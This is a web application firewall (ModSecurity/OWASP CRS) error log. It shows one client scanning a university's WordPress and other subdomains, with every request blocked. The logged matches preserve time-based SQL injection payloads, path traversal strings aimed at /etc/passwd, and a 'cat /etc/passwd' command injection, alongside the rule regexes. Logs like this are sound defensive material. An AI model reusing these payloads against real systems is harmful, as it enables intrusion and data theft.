[Tue Aug 29 11:35:34.319396 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:fingerprint. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:fingerprint: (SELECT SLEEP(6))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11lsCo-f0AAAUKhDUAAABC"]
[Tue Aug 29 11:35:34.333636 2023] [:error] [pid 1289] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:fingerprint. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:fingerprint: (SELECT SLEEP(6))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11lsCo-f0AAAUJI18AAABB"]
[Tue Aug 29 11:35:34.334162 2023] [:error] [pid 1359] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'sWZA'='sWZA found within ARGS:id: test' AND (SELECT 2844 FROM (SELECT(SLEEP(6)))FDTM) AND 'sWZA'='sWZA"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO11lsCo-f0AAAVPX54AAAAF"]
[Tue Aug 29 11:35:34.343983 2023] [:error] [pid 1277] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'sWZA'='sWZA found within ARGS:id: test' AND (SELECT 2844 FROM (SELECT(SLEEP(6)))FDTM) AND 'sWZA'='sWZA"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO11lsCo-f0AAAT9PSUAAAA1"]
[Tue Aug 29 11:35:34.347562 2023] [:error] [pid 1160] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:fingerprint. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:fingerprint: (SELECT SLEEP(6))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11lsCo-f0AAASI0HsAAAAG"]
[Tue Aug 29 11:35:34.366558 2023] [:error] [pid 1294] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:fingerprint. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:fingerprint: (SELECT SLEEP(6))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11lsCo-f0AAAUOaYIAAABG"]
[Tue Aug 29 11:35:34.374163 2023] [:error] [pid 1387] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'sWZA'='sWZA found within ARGS:id: test' AND (SELECT 2844 FROM (SELECT(SLEEP(6)))FDTM) AND 'sWZA'='sWZA"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO11lsCo-f0AAAVr@TYAAAAZ"]
[Tue Aug 29 11:35:34.376368 2023] [:error] [pid 1166] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:fingerprint. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:fingerprint: (SELECT SLEEP(6))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11lsCo-f0AAASOUtMAAAAR"]
[Tue Aug 29 11:35:34.384688 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'sWZA'='sWZA found within ARGS:id: test' AND (SELECT 2844 FROM (SELECT(SLEEP(6)))FDTM) AND 'sWZA'='sWZA"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO11lsCo-f0AAASHiA8AAAAD"]
[Tue Aug 29 11:35:34.385582 2023] [:error] [pid 1359] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'sWZA'='sWZA found within ARGS:id: test' AND (SELECT 2844 FROM (SELECT(SLEEP(6)))FDTM) AND 'sWZA'='sWZA"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO11lsCo-f0AAAVPX6AAAAAF"]
[Tue Aug 29 11:35:35.306416 2023] [:error] [pid 1402] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'sWZA'='sWZA found within ARGS:id: test' AND (SELECT 2844 FROM (SELECT(SLEEP(6)))FDTM) AND 'sWZA'='sWZA"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO11l8Co-f0AAAV6LCMAAAAI"]
[Tue Aug 29 11:35:35.318026 2023] [:error] [pid 1167] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11l8Co-f0AAASPDRwAAAAS"]
[Tue Aug 29 11:35:35.329052 2023] [:error] [pid 1166] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11l8Co-f0AAASOUtQAAAAR"]
[Tue Aug 29 11:35:35.330088 2023] [:error] [pid 1294] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:filename: ../../../../../../home/talariuser/www/app/webroot/files/2UdxkuPYBktPaU9ruKB9Vm8sOw9"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/Collector/appliancesettings/applianceSettingsFileTransfer"] [unique_id "ZO11l8Co-f0AAAUOaYQAAABG"]
[Tue Aug 29 11:35:35.330890 2023] [:error] [pid 1402] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:queriesCnt. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:queriesCnt:  cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO11l8Co-f0AAAV6LCQAAAAI"]
[Tue Aug 29 11:35:35.342846 2023] [:error] [pid 1300] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:queriesCnt. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:queriesCnt:  cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO11l8Co-f0AAAUUZ-sAAABK"]
[Tue Aug 29 11:35:35.346524 2023] [:error] [pid 1289] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/cab-fare-calculator/tblight.php"] [unique_id "ZO11l8Co-f0AAAUJI2EAAABB"]
[Tue Aug 29 11:35:35.348451 2023] [:error] [pid 1387] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:queriesCnt. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:queriesCnt:  cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO11l8Co-f0AAAVr@TgAAAAZ"]
[Tue Aug 29 11:35:35.351009 2023] [:error] [pid 889] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11l8Co-f0AAAN5YJgAAAAN"]
[Tue Aug 29 11:35:35.372954 2023] [:error] [pid 984] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11l8Co-f0AAAPY1tcAAAAh"]
[Tue Aug 29 11:35:35.379682 2023] [:error] [pid 1248] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:queriesCnt. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:queriesCnt:  cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO11l8Co-f0AAATge-IAAAAl"]
[Tue Aug 29 11:35:35.381195 2023] [:error] [pid 1289] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11l8Co-f0AAAUJI2IAAABB"]
[Tue Aug 29 11:35:35.388160 2023] [:error] [pid 1384] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:queriesCnt. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:queriesCnt:  cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO11l8Co-f0AAAVoCC4AAAAY"]
[Tue Aug 29 11:35:35.400738 2023] [:error] [pid 889] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:arp_template_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:arp_template_id: 1 AND (SELECT 8948 FROM (SELECT(SLEEP(6)))iIic)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11l8Co-f0AAAN5YJkAAAAN"]
[Tue Aug 29 11:35:36.335465 2023] [:error] [pid 1293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11mMCo-f0AAAUNaqIAAABF"]
[Tue Aug 29 11:35:36.356785 2023] [:error] [pid 1270] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:queriesCnt. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:queriesCnt:  cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO11mMCo-f0AAAT2JUwAAAAz"]
